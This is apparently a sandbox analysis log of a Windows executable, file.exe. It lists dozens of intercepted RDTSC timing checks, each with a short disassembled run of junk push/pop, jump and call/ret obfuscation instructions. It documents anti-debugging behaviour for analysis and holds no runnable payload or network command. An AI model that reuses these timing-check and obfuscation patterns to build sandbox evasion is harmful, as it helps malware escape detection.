Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 709C39 second address: 709C3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 709C3F second address: 709C43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 709C43 second address: 709C59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f ja 00007F56AD341B16h 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 709C59 second address: 709C5E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 708C26 second address: 708C46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56AD341B28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 70D85B second address: 70D875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F56ACB76F41h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 70CD71 second address: 70CD75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 70D579 second address: 70D57D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 70D6F7 second address: 70D6FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 70ED03 second address: 70ED0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 70ED0A second address: 70ED34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56AD341B1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 20D76359h 0x00000010 and esi, dword ptr [ebp+122D39B3h] 0x00000016 push 2E21B69Bh 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e pop edx 0x0000001f pop eax 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 70EE86 second address: 70EEA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56ACB76F3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d jno 00007F56ACB76F36h 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 70F029 second address: 70F02D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 70F02D second address: 70F031 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 70F3D6 second address: 70F3DB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 70F86D second address: 70F877 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F56ACB76F36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 70FCAD second address: 70FCB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71023B second address: 710245 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F56ACB76F3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 710245 second address: 7102A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F56AD341B18h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 xor dword ptr [ebp+12451EB4h], ebx 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebp 0x0000002e call 00007F56AD341B18h 0x00000033 pop ebp 0x00000034 mov dword ptr [esp+04h], ebp 0x00000038 add dword ptr [esp+04h], 00000017h 0x00000040 inc ebp 0x00000041 push ebp 0x00000042 ret 0x00000043 pop ebp 0x00000044 ret 0x00000045 mov edi, dword ptr [ebp+122D3ABBh] 0x0000004b push 00000000h 0x0000004d push eax 0x0000004e pushad 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 710CC9 second address: 710CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 710AA7 second address: 710AB1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F56AD341B16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 710CCE second address: 710CD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 711BCF second address: 711BD4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 711BD4 second address: 711BE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 je 00007F56ACB76F44h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 711BE6 second address: 711BEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 711BEA second address: 711C56 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007F56ACB76F38h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 00000017h 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 clc 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push edi 0x00000027 call 00007F56ACB76F38h 0x0000002c pop edi 0x0000002d mov dword ptr [esp+04h], edi 0x00000031 add dword ptr [esp+04h], 00000018h 0x00000039 inc edi 0x0000003a push edi 0x0000003b ret 0x0000003c pop edi 0x0000003d ret 0x0000003e mov dword ptr [ebp+122D3785h], edx 0x00000044 cld 0x00000045 push 00000000h 0x00000047 adc esi, 593E2896h 0x0000004d xchg eax, ebx 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 jmp 00007F56ACB76F3Eh 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 711C56 second address: 711C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 711C5B second address: 711C6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56ACB76F3Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 711C6F second address: 711C89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56AD341B23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71269B second address: 7126A5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F56ACB76F36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71324A second address: 713250 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7132F7 second address: 7132FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7152ED second address: 7152F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7152F1 second address: 71533D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, dword ptr [ebp+122D3A63h] 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007F56ACB76F38h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c mov dword ptr [ebp+124521AAh], ecx 0x00000032 sbb di, F69Fh 0x00000037 push 00000000h 0x00000039 mov esi, dword ptr [ebp+122D3B3Bh] 0x0000003f xchg eax, ebx 0x00000040 push eax 0x00000041 push edx 0x00000042 jl 00007F56ACB76F38h 0x00000048 push edi 0x00000049 pop edi 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71533D second address: 715350 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F56AD341B18h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 715350 second address: 715356 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71845A second address: 71849D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jng 00007F56AD341B16h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 mov di, si 0x00000014 push 00000000h 0x00000016 mov edi, dword ptr [ebp+122D17F7h] 0x0000001c push 00000000h 0x0000001e pushad 0x0000001f or dh, FFFFFFEBh 0x00000022 mov dword ptr [ebp+122D2DD2h], eax 0x00000028 popad 0x00000029 mov edi, dword ptr [ebp+124614F4h] 0x0000002f xchg eax, esi 0x00000030 pushad 0x00000031 pushad 0x00000032 js 00007F56AD341B16h 0x00000038 pushad 0x00000039 popad 0x0000003a popad 0x0000003b je 00007F56AD341B1Ch 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71849D second address: 7184AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jg 00007F56ACB76F36h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7194B1 second address: 719549 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56AD341B26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F56AD341B18h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 add dword ptr [ebp+12451EB4h], ebx 0x0000002d push 00000000h 0x0000002f or dword ptr [ebp+122D180Ch], esi 0x00000035 mov bx, 96E5h 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push ebp 0x0000003e call 00007F56AD341B18h 0x00000043 pop ebp 0x00000044 mov dword ptr [esp+04h], ebp 0x00000048 add dword ptr [esp+04h], 00000016h 0x00000050 inc ebp 0x00000051 push ebp 0x00000052 ret 0x00000053 pop ebp 0x00000054 ret 0x00000055 call 00007F56AD341B1Dh 0x0000005a mov ebx, 0936C2D5h 0x0000005f pop ebx 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007F56AD341B1Bh 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 719549 second address: 719553 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F56ACB76F36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71A480 second address: 71A48E instructions: 0x00000000 rdtsc 0x00000002 je 00007F56AD341B16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 715B03 second address: 715B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71862E second address: 7186B8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F56AD341B22h 0x0000000c nop 0x0000000d mov edi, dword ptr [ebp+122D3B67h] 0x00000013 push dword ptr fs:[00000000h] 0x0000001a ja 00007F56AD341B1Dh 0x00000020 je 00007F56AD341B17h 0x00000026 cld 0x00000027 or edi, 781CA8F3h 0x0000002d mov dword ptr fs:[00000000h], esp 0x00000034 mov ebx, edx 0x00000036 mov eax, dword ptr [ebp+122D1179h] 0x0000003c push FFFFFFFFh 0x0000003e push 00000000h 0x00000040 push edi 0x00000041 call 00007F56AD341B18h 0x00000046 pop edi 0x00000047 mov dword ptr [esp+04h], edi 0x0000004b add dword ptr [esp+04h], 0000001Ch 0x00000053 inc edi 0x00000054 push edi 0x00000055 ret 0x00000056 pop edi 0x00000057 ret 0x00000058 add ebx, dword ptr [ebp+122D39B3h] 0x0000005e mov dword ptr [ebp+122D2116h], ebx 0x00000064 nop 0x00000065 je 00007F56AD341B28h 0x0000006b push eax 0x0000006c push edx 0x0000006d jnl 00007F56AD341B16h 0x00000073 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 715B09 second address: 715B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71C302 second address: 71C359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 nop 0x00000008 movsx ebx, si 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F56AD341B18h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 push 00000000h 0x00000029 jmp 00007F56AD341B24h 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 push edx 0x00000032 jmp 00007F56AD341B22h 0x00000037 pop edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7186B8 second address: 7186BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71D3BE second address: 71D3C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71D3C2 second address: 71D3DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56ACB76F41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71E465 second address: 71E47A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jnl 00007F56AD341B18h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71F552 second address: 71F556 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 720627 second address: 72062E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71F684 second address: 71F688 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71F688 second address: 71F699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push ebx 0x00000009 js 00007F56AD341B1Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7214C8 second address: 7214CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71F699 second address: 71F721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 nop 0x00000006 cld 0x00000007 push dword ptr fs:[00000000h] 0x0000000e sbb edi, 36CB38DBh 0x00000014 mov dword ptr fs:[00000000h], esp 0x0000001b jmp 00007F56AD341B1Eh 0x00000020 call 00007F56AD341B26h 0x00000025 mov edi, dword ptr [ebp+1244DAEBh] 0x0000002b pop edi 0x0000002c mov eax, dword ptr [ebp+122D13D9h] 0x00000032 ja 00007F56AD341B27h 0x00000038 jmp 00007F56AD341B21h 0x0000003d adc bx, EA22h 0x00000042 push FFFFFFFFh 0x00000044 mov edi, dword ptr [ebp+122D378Fh] 0x0000004a nop 0x0000004b ja 00007F56AD341B1Ch 0x00000051 pushad 0x00000052 push eax 0x00000053 pop eax 0x00000054 push edi 0x00000055 pop edi 0x00000056 popad 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a jng 00007F56AD341B1Ch 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7214CE second address: 7214D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71F721 second address: 71F725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72255D second address: 722561 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 722561 second address: 7225DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F56AD341B18h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 jmp 00007F56AD341B1Dh 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push eax 0x00000030 call 00007F56AD341B18h 0x00000035 pop eax 0x00000036 mov dword ptr [esp+04h], eax 0x0000003a add dword ptr [esp+04h], 0000001Ah 0x00000042 inc eax 0x00000043 push eax 0x00000044 ret 0x00000045 pop eax 0x00000046 ret 0x00000047 movsx edi, ax 0x0000004a mov bx, 591Ch 0x0000004e xchg eax, esi 0x0000004f pushad 0x00000050 push eax 0x00000051 jng 00007F56AD341B16h 0x00000057 pop eax 0x00000058 js 00007F56AD341B1Ch 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7217AC second address: 7217B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7235D7 second address: 7235DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7235DB second address: 7235E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7235E8 second address: 7235F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F56AD341B16h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7237DF second address: 7237E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72662F second address: 726633 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 726633 second address: 726639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72773A second address: 727759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 jo 00007F56AD341B16h 0x0000000b pop edx 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F56AD341B1Fh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 727759 second address: 7277BB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F56ACB76F3Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F56ACB76F38h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 push 00000000h 0x00000027 mov edi, dword ptr [ebp+122D2848h] 0x0000002d push 00000000h 0x0000002f mov ebx, 150CFCF2h 0x00000034 xchg eax, esi 0x00000035 jmp 00007F56ACB76F45h 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d push esi 0x0000003e pushad 0x0000003f popad 0x00000040 pop esi 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 727921 second address: 72792A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72792A second address: 72792E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7279F0 second address: 7279FA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F56AD341B1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7279FA second address: 727A06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72B0F3 second address: 72B0F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72B0F7 second address: 72B0FD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72B0FD second address: 72B11C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F56AD341B21h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72B11C second address: 72B123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72B123 second address: 72B133 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F56AD341B1Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 730ABB second address: 730AC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F56ACB76F3Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7303B8 second address: 7303D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 ja 00007F56AD341B16h 0x0000000b jmp 00007F56AD341B22h 0x00000010 pop ebx 0x00000011 rdtsc
